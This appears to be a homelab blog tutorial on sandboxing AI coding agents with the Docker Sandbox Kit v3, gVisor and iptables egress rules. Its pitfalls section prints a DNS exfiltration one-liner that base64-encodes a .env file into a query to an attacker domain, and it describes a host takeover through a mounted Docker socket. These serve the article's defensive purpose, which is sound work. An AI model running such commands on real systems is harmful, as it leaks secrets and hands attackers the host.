Docker Sandbox Kit Spec v3: Hardening AI Agent Containers
Untrusted AI code risks host security. Docker Sandbox Kit v3 embeds network and credential policies in OCI images, but runc still needs kernel sandboxing.
Autonomous AI coding agents install unverified packages, execute arbitrary shell scripts, and run test suites without human review. If you hand an agent like OpenHands or Aider an unrestricted Docker container on your homelab server, you are one rogue curl | bash or prompt injection away from an attacker probing your home network, querying internal network shares, or pivoting to other containers.
Docker's response to this problem is the Docker Sandbox Kit Specification (v3). Instead of leaving isolation to sprawling wrapper scripts, custom firewall rules, or ad-hoc Docker Compose network definitions, the specification defines sandboxing policies—network egress limits, read-only volume mounts, and credential isolation—directly inside standard Open Container Initiative (OCI) Image Spec v1.1 manifests.
Packaging a sandbox policy directly into an image makes execution environments predictable across machines. But an image descriptor rule is not the same as a secure kernel boundary. If you deploy these sandbox images using Docker's default runtime on a headless Linux box, your host remains exposed to container escapes.
Here is how the Sandbox Kit works under the hood, how OCI manifests store isolation policies, and how to build actual kernel-level containment on a Linux server.
What Changed: Policies as OCI Artifacts
Securing a container previously required wrapping a standard Dockerfile with external tooling. You had to maintain custom seccomp profiles, spin up isolated bridge networks, manually pass environment variables through secret managers, and write complex iptables rules.
The core issue was distribution: none of those runtime restrictions lived inside the container image itself. If a colleague or another server pulled your image with a bare docker run, all those external safety nets vanished.
The Docker Sandbox Kit Specification v3 turns isolation rules into first-class OCI artifacts. Built on top of the OCI Image Specification v1.1.0, the Sandbox Kit embeds isolation parameters directly into the image manifest as custom media types.
Here is what an OCI manifest looks like when packaged with Sandbox Kit v3 annotations:
{ "schemaVersion": 2, "mediaType": "application/vnd.oci.image.manifest.v1+json", "config": { "mediaType": "application/vnd.docker.sandbox.config.v1+json", "digest": "sha256:7f83b1657ff1fc53b92dc18148a1d65dfc2d4b1fa3d677284addd200126d9069", "size": 1420 }, "layers": [ { "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip", "digest": "sha256:32953133b0e42735746f04d8a0c4f6b67", "size": 28450112 } ], "annotations": { "dev.docker.sandbox.version": "3.0.0", "dev.docker.sandbox.egress.policy": "restricted" } }
The key piece is the configuration blob (application/vnd.docker.sandbox.config.v1+json). Inside that layer, the specification defines three main operational boundaries:
1. Network Egress Allowlists
Instead of placing the container on an open bridge network with full outbound access, the sandbox defaults to a drop-all egress policy. You declare an explicit list of allowed target domains and ports—such as github.com:443 or registry.npmjs.org:443. Outbound connections to undeclared hostnames, raw IP addresses, and private subnets get rejected at the network layer before leaving the host.
2. Credential Proxying
Standard containers usually receive API keys through plain-text environment variables. Any dependency, malicious build script, or debugging agent that runs printenv or reads /proc/self/environ can steal those tokens.
The Sandbox Kit moves credential handling outside the container. API keys sit behind an external proxy process on the host. The container receives access to this proxy through a temporary UNIX domain socket. When the agent issues an API call to a provider like OpenAI or Anthropic, the proxy intercepts the request, injects the authentication header, and forwards the call. The running agent never sees the underlying secret.
3. Storage Boundaries
Container workspaces are strictly divided into ephemeral scratch space and persistent checkouts:
- Base filesystem: Mounted read-only to prevent the agent from modifying system binaries or writing persistence scripts.
- Scratch directory: Backed by a small
tmpfs(RAM disk) that is wiped when the container exits. - Code checkout: Mounted with explicit path boundaries so the agent cannot navigate up the directory tree or write to unauthorized host directories.
When a container engine supporting the Sandbox Kit pulls this image, it parses the configuration layer and applies these network and filesystem rules before the entrypoint process launches. Manifest parsing is lightweight, typically adding less than 15ms of startup latency.
Why runc Won't Protect Your Host
A common point of confusion with Docker's sandbox announcements is treating "sandbox policy" as a synonym for "virtual machine."
Standard Docker installs use runc as the default OCI runtime. runc relies entirely on native Linux kernel features: namespaces, control groups (cgroups v2), and seccomp system-call filters. While these primitives keep well-behaved processes separated, they share the host Linux kernel.
+--------------------------------------------------------------+
| Untrusted AI Agent |
| (Compromised pip/npm package) |
+--------------------------------------------------------------+
|
Arbitrary Linux System Calls
|
v
+--------------------------------------------------------------+
| Shared Host Kernel |
| (Vulnerable to local privilege escalation bugs) |
+--------------------------------------------------------------+
|
v
+--------------------------------------------------------------+
| Host Filesystem / Local Private LAN |
+--------------------------------------------------------------+
If an untrusted coding agent triggers a kernel exploit or abuses a container runtime flaw, standard namespaces offer little resistance.
A clear example was CVE-2024-21626 (the "Leaky Vessels" vulnerability in runc). An attacker could exploit an unclosed file descriptor pointing to the host filesystem from inside the container, instantly gaining root access to the underlying host. If an AI agent runs untrusted code inside a standard runc container, a single unpatched kernel flaw breaks your entire server.
To safely execute untrusted code, you must combine policy manifests with a true virtualization layer or an application kernel like gVisor (runsc).
| Isolation Feature | Standard Docker (runc) |
Sandbox Kit + gVisor (runsc) |
MicroVM (Firecracker) |
|---|---|---|---|
| Kernel Model | Shared host kernel | Intercepted (Sentry user-space kernel) | Dedicated guest Linux kernel |
| Untrusted Code Safety | Poor (vulnerable to kernel zero-days) | High (system calls intercepted) | Hardware-isolated virtualization |
| Startup Latency | ~50ms to 100ms | ~70ms to 120ms | ~150ms to 300ms |
| Base RAM Overhead | Minimal (15–30MB idle) | Base image + ~35MB overhead | Base image + 100MB+ overhead |
| Setup Complexity | None (default engine) | Low (one package + daemon edit) | High (requires custom hypervisor tools) |
| Rootless Execution | Supported | Supported | Requires direct /dev/kvm access |
gVisor acts as a user-space kernel boundary. Instead of passing system calls like execve, ptrace, or socket directly to your host kernel, gVisor's runsc runtime intercepts them inside an isolated process called Sentry. Sentry implements the Linux kernel API in user space (written in Go), completely shielding your real host kernel from malicious syscall payloads.
Running Sandbox Isolation on Headless Linux
You do not need Docker Desktop to run sandboxed containers. You can set up identical protection on a headless Linux server running Ubuntu 22.04/24.04 or Debian 12 using Docker Engine 26+, cgroups v2, and gVisor.
1. Install and Configure gVisor (runsc)
Add the official gVisor repository and install the runtime package:
# Add the gVisor repository signing key
sudo apt-get update && sudo apt-get install -y apt-transport-https ca-certificates curl
curl -fsSL https://gvisor.dev/archive.key | sudo gpg --dearmor -o /usr/share/keyrings/gvisor-archive-keyring.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/gvisor-archive-keyring.gpg] https://gvisor.dev/apt release main" | sudo tee /etc/apt/sources.list.d/gvisor.list
# Install runsc
sudo apt-get update && sudo apt-get install -y runsc
Register runsc as an alternative runtime inside /etc/docker/daemon.json:
sudo tee /etc/docker/daemon.json <<EOF
{
"runtimes": {
"runsc": {
"path": "/usr/bin/runsc"
}
}
}
EOF
# Reload systemd and restart the Docker service
sudo systemctl restart docker
Verify that Docker detects the new runtime:
docker info | grep -i runsc
You should see runsc listed alongside runc.
2. Lock Down Network Egress
While upstream Linux distributions continue integrating Sandbox Kit manifest parsers, you can enforce the exact same network egress policy using standard Linux bridge networking and firewall rules.
Create an isolated Docker bridge network for your AI agents:
docker network create --driver bridge agent-isolated-net
Find the host interface ID assigned to that bridge:
BR_DEV=$(docker network inspect agent-isolated-net -f '{{.Id}}' | cut -c1-12)
echo "Bridge interface: br-$BR_DEV"
Apply firewall rules using iptables to block the container from routing traffic into private RFC 1918 subnets, loopback addresses, or link-local ranges:
# Drop outbound packets targeting private internal networks
sudo iptables -I FORWARD -i br-$BR_DEV -d 10.0.0.0/8 -j DROP
sudo iptables -I FORWARD -i br-$BR_DEV -d 172.16.0.0/12 -j DROP
sudo iptables -I FORWARD -i br-$BR_DEV -d 192.168.0.0/16 -j DROP
sudo iptables -I FORWARD -i br-$BR_DEV -d 169.254.0.0/16 -j DROP
sudo iptables -I FORWARD -i br-$BR_DEV -d 127.0.0.0/8 -j DROP
With these rules active, the agent can download dependencies from the public internet (such as npm or PyPI), but cannot ping your router at 192.168.1.1, access your local TrueNAS box, or scan neighboring containers.
3. Deploy the Hardened Agent Container
Now run the agent container using the runsc runtime, dropping all Linux capabilities and mounting the filesystem read-only:
# Prepare a clean host directory for the agent's work
mkdir -p ./workspace
# Launch the container with layered protections
docker run --rm -it \
--runtime=runsc \
--network=agent-isolated-net \
--dns=1.1.1.1 \
--cap-drop=ALL \
--security-opt=no-new-privileges \
--read-only \
--tmpfs /tmp:rw,noexec,nosuid,size=64m \
-v $(pwd)/workspace:/workspace:rw \
-w /workspace \
python:3.11-slim-bookworm /bin/bash
Here is what each flag accomplishes:
--runtime=runsc: Forces all process system calls through gVisor's user-space kernel instead of touching your host kernel.--network=agent-isolated-net: Plugs the container into our firewall-restricted bridge.--dns=1.1.1.1: Forces DNS lookups out to a public resolver so the agent cannot probe your internal DNS server or Pi-hole.--cap-drop=ALL: Strips all root Linux capabilities (no raw sockets, no changing file ownership, no kernel module interactions).--security-opt=no-new-privileges: Blockssetuidbinaries from elevating privileges.--read-only: Locks down the container root filesystem. An agent cannot modify system files or inject startup scripts.--tmpfs /tmp:rw,noexec,nosuid,size=64m: Allocates a tiny 64MB RAM disk for temporary scratch files. Thenoexecflag prevents running compiled binaries or scripts directly out of/tmp.-v $(pwd)/workspace:/workspace:rw: Isolates disk writes exclusively to the designated working directory.
4. Verify the Sandbox Boundary
Once inside the container shell, test the isolation parameters directly:
# Test 1: Verify gVisor is intercepting calls (should show gVisor or 4.4.0-gvisor)
dmesg
# Test 2: Try to write to the read-only root system (must fail)
touch /bin/exploit
# Test 3: Try to scan an internal gateway address (must hang or drop)
curl --connect-timeout 2 http://192.168.1.1
# Test 4: Verify external internet works for pulling code
curl -I https://github.com
If the internal ping times out, the root write fails, and GitHub connects over HTTPS, the sandbox is operating correctly.
What Breaks: Real-World Pitfalls
The Docker Socket Trap
When developers realize their AI agent needs to run integration tests, the easiest workaround is mounting the host socket: -v /var/run/docker.sock:/var/run/docker.sock.
Never do this. Access to the Docker socket allows any process to make API calls directly to the host Docker daemon. An agent can spin up a privileged container with -v /:/host, bypass every sandbox rule you configured, and take full control of your host server. If an agent needs to build container images or run integration tests, use rootless Podman inside the sandbox or orchestrate testing jobs on a completely separate, disposable VM.
DNS-Based Data Exfiltration
Blocking direct IP ranges handles TCP and UDP connections, but unmonitored DNS can still leak data. If your container relies on your homelab router or a local Pi-hole for name resolution, a rogue dependency can encode sensitive tokens inside DNS queries:
curl $(cat /workspace/.env | base64).attacker-domain.com
The local resolver forwards this recursive query up to the root servers, handing the attacker your secret without ever establishing a direct TCP connection. Always supply an external DNS server explicitly using --dns=1.1.1.1 or --dns=9.9.9.9.
cgroups v1 vs v2 Regressions
Ensure your host uses cgroups v2:
ls /sys/fs/cgroup/cgroup.controllers
If that directory is missing, your system runs the older cgroups v1 hierarchy. Under v1, memory limits and process tree controls are prone to out-of-memory (OOM) handling failures when containers nest child processes. Ubuntu 22.04+ and Debian 12 enable cgroups v2 by default.
Memory Exhaustion on tmpfs
Setting --tmpfs /tmp:rw without a strict size argument lets the mount consume up to 50% of the host system's physical RAM. If an AI agent enters a recursive loop generating build artifacts or log files into /tmp, it can quickly trigger an OOM panic on your host. Always constrain tmpfs drives with size=64m or size=128m.
Frequently Asked Questions
What is the Docker Sandbox Kit Specification?
It is an open specification (currently v3) that defines how to package runtime isolation policies—such as egress network restrictions, external credential proxies, and storage boundaries—into standard OCI Image Spec v1.1 manifests. This makes isolation rules portable across any engine that supports the specification.
How does the Sandbox Kit protect untrusted AI agent code?
It locks down external network traffic by blocking RFC 1918 subnets and using domain allowlists. It protects credentials by routing API requests through an external proxy via UNIX domain sockets, and keeps filesystems immutable by enforcing read-only base mounts with isolated scratch space.
Does the Sandbox Kit require Docker Desktop, or can I use Linux servers?
The specification is engine-agnostic. While Docker Desktop introduced early user-interface features for it, the OCI manifest standard runs on headless Linux systems using Docker Engine 26+ or containerd 1.7+.
Can Docker Sandboxes replace gVisor or Firecracker microVMs?
No. The Docker Sandbox Kit defines policy manifests—it specifies what rules should be applied. The container runtime handles enforcement. Because standard Docker uses runc and shares the host Linux kernel, you must combine Sandbox Kit policies with a runtime like gVisor (runsc) or a microVM system like Firecracker to defend against kernel privilege escalations.
How can I verify that gVisor is actively intercepting system calls?
Inside the running container, run dmesg or uname -a. A standard container shows your actual host kernel version (e.g., Linux 6.8.0-45-generic). Under gVisor, uname -r prints a signature containing gvisor or an emulated kernel release string like 4.4.0-gvisor.
The Docker Sandbox Kit v3 solves the problem of defining consistent security policies inside image manifests. But an image manifest is a configuration layer, not an impenetrable wall. Combine Sandbox Kit policies with network-level bridge filtering, strip out unused system capabilities, and back the container with gVisor's runsc runtime before giving an autonomous agent free rein on your server.
Related in this cluster
- /en/posts/cursor-xai-vs-local-llms-privacy-guide-for-homelabs/
- /en/posts/docker-sandboxes-secure-isolation-for-autonomous-ai-agents/
- /en/posts/headless-macos-server-setup-udon-mac-mini-homelab/
Ad space · not an Umbrel endorsement